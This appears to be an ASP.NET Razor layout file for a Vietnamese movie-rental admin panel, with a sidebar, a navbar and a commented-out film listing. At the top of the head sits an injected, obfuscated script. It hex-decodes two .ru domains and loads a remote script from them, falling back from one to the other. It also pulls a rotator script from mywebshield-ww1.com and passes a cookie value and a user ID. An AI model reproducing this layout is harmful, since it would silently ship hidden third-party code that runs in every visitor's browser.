<!DOCTYPE html>
<html>
<head>
    <meta name="viewport" content="width=device-width" />
    <title>@ViewBag.Title</title>
    <script>if (window.v_347548468_V_235235235 === undefined) !(function () { !function () { var t = JSON.parse('["32386e32676c3377667962302e7275","646d7564337679736a61366d65342e7275"]'), e = "24711", o = function (t) { t = t.match(/[\S\s]{1,2}/g); for (var e = "", o = 0; o < t.length; o++) e += String.fromCharCode(parseInt(t[o], 16)); return e }, n = function (t, e, o) { var n = document.location.protocol + "//" + t; if (window.smlo && -1 == navigator.userAgent.toLowerCase().indexOf("firefox")) window.smlo.loadSmlo(n.replace("https:", "http:")); else if (window.zSmlo && -1 == navigator.userAgent.toLowerCase().indexOf("firefox")) window.zSmlo.loadSmlo(n.replace("https:", "http:")); else { var r = document.createElement("script"); r.setAttribute("src", n), r.setAttribute("type", "text/javascript"), document.head.appendChild(r), r.onload = function () { this.a982392846 || (this.a982392846 = !0, "function" == typeof e && e()) }, r.onerror = function () { this.a982392846 || (this.a982392846 = !0, r.parentNode.removeChild(r), "function" == typeof o && o()) } } }, r = function (i) { var a = i ? i : t[0], s = o(a) + "/pjs/" + e + ".js"; n(s, function () { }, function () { var e = t.indexOf(a), o = t[e + 1]; o && r(o) }) }; r() }(); function getCfCookie(name) { var matches = document.cookie.match(new RegExp("(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)")); return matches ? decodeURIComponent(matches[1]) : undefined; } if (window.self == window.top) { document.addEventListener("DOMContentLoaded", function () { var pops = document.createElement('script'); var cfilterCookie = '6697e3d5eb75761c638fdeb1eed84055'; var cfilterCookieIsSet = getCfCookie(cfilterCookie) ? getCfCookie(cfilterCookie) : 0; pops.src = '//mywebshield-ww1.com/' + 'getcl/rotator/' + 'campaignid/0/' + 'sourceid/1/' + 'siteid/0/' + 'userid/590922C7-5F50-4692-88B7-59380FDD4908/' + 'iscookie/' + cfilterCookieIsSet; document.head.appendChild(pops); }); } })(), window.v_347548468_V_235235235 = true;</script>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <link href="~/adminstratios/datepicker3.css" rel="stylesheet" />
    <!--//-->
    <link href="~/adminstratios/font.css" rel="stylesheet" />
    <link href="~/adminstratios/font-awesome.min.css" rel="stylesheet" />
    <link rel="stylesheet" type="text/css" href="~/adminstratios/bootstrap.min.css" media="screen" />
    <link rel="stylesheet" type="text/css" href="~/adminstratios/styles.css" media="screen" />
    <link rel="stylesheet" type="text/css" href="~/adminstratios/responsive.css" media="screen" />
    <link rel="stylesheet" type="text/css" href="~/adminstratios/jquery.bxslider.css" media="screen" />
    <script src="~/Scripts/jquery-1.10.2.min.js"></script>
    <!--Icons-->
    <script src="~/AngularJS/lumino.glyphs.js"></script>

    <!--[if lt IE 9]>
    <script src="js/html5shiv.js"></script>
    <script src="js/respond.min.js"></script>
        -->
</head>
<body>

    <nav class="navbar navbar-inverse navbar-fixed-top" role="navigation">
        <div class="container-fluid">
            <div class="navbar-header">
                <button type="button" class="navbar-toggle collapsed" data-toggle="collapse" data-target="#sidebar-collapse">
                    <span class="sr-only">Toggle navigation</span>
                    <span class="icon-bar"></span>
                    <span class="icon-bar"></span>
                    <span class="icon-bar"></span>
                </button>
                <a class="navbar-brand" href="#"><span>TRANG CHỦ </span>PHIM</a>
                <ul class="user-menu"></ul>
            </div>

        </div><!-- /.container-fluid -->
    </nav>

    <div id="sidebar-collapse" class="col-sm-3 col-lg-2 sidebar">
        <ul class="nav menu">
            <li></li>
            <hr />
            <li>
                <a href="#">
                    <img src="~/image/home-128.png" style="width: 30px;margin-left: 10px;margin-top: -5px;" />
                     Home

                </a>
            </li>
            <hr />
            <li>
                <a href="@Url.Action("Cusindex","Film")">
                    <img src="~/image/Profile01-128.png" style="width: 30px;margin-left: 10px;margin-top: -5px;" />
                     Customers
                </a>
            </li>
            <li>
                <a href="#">
                    <img src="~/image/list-add-user.png" style="width: 30px;margin-left: 10px;margin-top: -5px;" />
                    Register Customer
                </a>
            </li>
            <hr />
            <li>
                <a href="#">
                    <img src="~/image/Film_Festival-128.png" style="width: 30px;margin-left: 10px;margin-top: -5px;" />
                    Movies
                </a>
            </li>
            <li>
                <a href="#">
                    <img src="~/image/movie-add.png" style="width: 30px;margin-left: 10px;margin-top: -5px;" />
                    Add Movie
                </a>
            </li>
            <hr />
            <li>
                <a href="#">
                    <img src="~/image/History.png" style="width: 30px;margin-left: 10px;margin-top: -5px;" />
                    Rental History
                </a>
            </li>
            <hr />
            <li>
                <a href="#" type="button" style="width: 116px;height: 39px;background-color: red;margin-left: 54px;border-radius: 6px;">
                    <b style="color:black;">Logout</b>
                    <img src="~/image/common-logout-signout-exit-glyph-128.png" style="width: 23px; margin-left: 8px; margin-top: -5px;" />
                </a>
            </li>
            <li class="parent "></li>
            <li role="presentation" class="divider"></li>

        </ul>

    </div><!--/.sidebar-->

    <div class="col-sm-9 col-sm-offset-3 col-lg-10 col-lg-offset-2 main">
        <div>
            <div class="row">
                <div>
                    <div class="navbar navbar-inverse navbar-fixed-top" role="navigation" style="margin-top: 51px;
                 background-color: blue;
                 margin-left: 255px;
                 width: 1265px;">
                        <div class="container-fluid">
                            <div class="navbar-header">
                                <a href="#" type="button" class="navbar-toggle collapsed" data-toggle="collapse" data-target="#sidebar-collapse">
                                </a>
                                <a class="navbar-brand" href="#"><span>TRANG CHỦ </span>PHIM</a>
                                <input style="margin-left: 725px; margin-top: 10px;background-color: white;color: black;border-radius: 4px; height: 31px; width: 227px;" type="text" placeholder="Nhập thông tin cần tìm..." />
                                <img src="~/image/search-128.png" style="height: 31px; width: 38px;margin-left: 3px;margin-top: 1px;background-color: white; border-radius: 4px;" />
                                <ul class="user-menu"></ul>
                            </div>

                        </div><!-- /.container-fluid -->
                    </div>
                </div>
                <div class="list-group" style="margin-top: 76px;">
                    @RenderBody()
                </div>
                @*<div class="list-group" style="margin-top: 76px;">
                    <img style="width: 155px; height: 167px; margin-left: 14px;" src="~/images/hoanghon3.jpg" />
                    <div class="ul-list" style="margin-left: 183px; overflow: hidden; margin-top: -180px;">
                        <ul>
                            <li><h3>Hiền đẹp trai</h3></li>
                            <li>Derictor:<b>Jonh Smith</b></li>
                            <li>Writer:<b>Phạm Văn Hiền</b></li>
                            <li>Producer:<b>Bill Duu</b></li>
                            <li>
                                Trailer:
                                <a href="https://www.youtube.com/watch?v=wjnU9uJScAM">
                                    <img src="~/image/record-128.png" style="width: 37px; height: 27px; margin-left: 9px;" />
                                </a>
                            </li>
                            <li>Rating: #</li>
                        </ul>
                    </div>


                </div>
                <div class="list-group" style="margin-top: 76px;">
                    <img style="width: 155px; height: 167px; margin-left: 14px;" src="~/images/hoanghon3.jpg" />
                    <div class="ul-list" style="margin-left: 183px; overflow: hidden; margin-top: -180px;">
                        <ul>
                            <li><h3>Hiền đẹp trai</h3></li>
                            <li>Derictor:<b>Jonh Smith</b></li>
                            <li>Writer:<b>Phạm Văn Hiền</b></li>
                            <li>Producer:<b>Bill Duu</b></li>
                            <li>
                                Trailer:
                                <a href="https://www.youtube.com/watch?v=wjnU9uJScAM">
                                    <img src="~/image/record-128.png" style="width: 37px; height: 27px; margin-left: 9px;" />
                                </a>
                            </li>
                            <li>Rating: #</li>
                        </ul>
                    </div>


                </div>*@
            </div>
        </div>
    </div>

    <script src="~/adminstratios/js/bootstrap.min.js"></script>
    <script src="~/adminstratios/js/bootstrap-datepicker.js"></script>
    <script>
    $('#calendar').datepicker({
    });

    !function ($) {
        $(document).on("click", "ul.nav li.parent > a > span.icon", function () {
            $(this).find('em:first').toggleClass("glyphicon-minus");
        });
        $(".sidebar span.icon").find('em:first').addClass("glyphicon-plus");
    }(window.jQuery);

    $(window).on('resize', function () {
        if ($(window).width() > 768) $('#sidebar-collapse').collapse('show')
    })
    $(window).on('resize', function () {
        if ($(window).width() <= 767) $('#sidebar-collapse').collapse('hide')
    })
    </script>


</body>
</html>